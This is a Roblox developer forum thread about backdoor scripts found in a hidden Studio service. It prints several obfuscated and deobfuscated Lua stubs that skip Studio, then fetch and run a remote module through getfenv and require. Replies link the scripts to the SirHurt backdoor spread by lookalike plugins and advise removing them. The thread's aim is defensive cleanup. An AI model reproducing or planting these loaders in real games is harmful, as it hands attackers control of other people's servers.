Removing backdoor scripts located in a hidden service?

if you enable “Show hidden objects in explorer”, in Roblox Studio settings, you can find a service named “NonReplicatedCSGDictionaryService”.
image


--[[ 278097 ]]--

spawn(function()game:WaitForChild('\83\101\114\118\101\114\83\99\114\105\112\116\83\101\114\118\105\99\101')if game:GetService('\87\111\114\107\115\112\97\99\101').Terrain:FindFirstChild('\67\97\108\108\70')then return end;if game:GetService('\82\117\110\83\101\114\118\105\99\101'):IsStudio()then return end;pcall(function()getfenv()['\114\101\113\117\105\114\101'](math.sqrt(math.sqrt(4.9693005147685e+37) - 122013)).load(game.PlaceId)end)end)

or

--[[ 278097 ]]--

marketplaceService = game:GetService('MarketplaceService') productInfo = marketplaceService:GetProductInfo(2655062037) modulefunc = productInfo.Description modulefunc = tonumber(string.match(modulefunc, '%d+')) if game:GetService('RunService'):IsStudio()then return end getfenv()['require'](modulefunc)[tostring(productInfo.Name)](game.PlaceId)

I’ve seen a thread talking about this same thing, but they found it by disabling internet and then getting errors from these scripts, if I recall correctly.

edit: if you ever find a script like this, just delete it and verify that all your plugins are indeed original and not some ripoff backdoor infecting rathole.

this turned out to be a stub of the sirhurt backdoor, which is basically unexistant at this point, so this exact code shouldn’t be existant anymore.


SirHurt was inside of @Toadiant’s game, DisneyLand Robloxia, 'SirHunt' exploit happening to my game

3 Likes

You likely installed a plugin that does this; many of them disguise themselves to look identical to popular trusted plugins. Find the culprit by disabling plugins one by one and seeing if the scripts still appear in a new place.

And for clarity; yes this is most likely a malicious insertion of a backdoor or similar.

1 Like

There’s a plugin which helps you remove these but you’ll need to find the plugin doing it as well. Most likely these backdoor scripts are outdated as well.

They use Backpacks to run code which has already been fixed.

It also appears they check if the game is Studio so that you can’t see any errors.

It looks like a plugin is doing this. I checked for myself and I see nothing of that sort. image

Also this is what the code looks like and it leads to a deleted module or something.

spawn(function()
game:WaitForChild('ServerScriptService')
if game:GetService('Workspace').Terrain:FindFirstChild('CallF') then return end;
if game:GetService('RunService'):IsStudio() then return end;
pcall(function() getfenv()['require'](2655056793).load(game.PlaceId) end)
end)

In theory you SHOULDN’T have to worry about it anymore, but it’d help if you could at least locate the plugin that’s doing this.

1 Like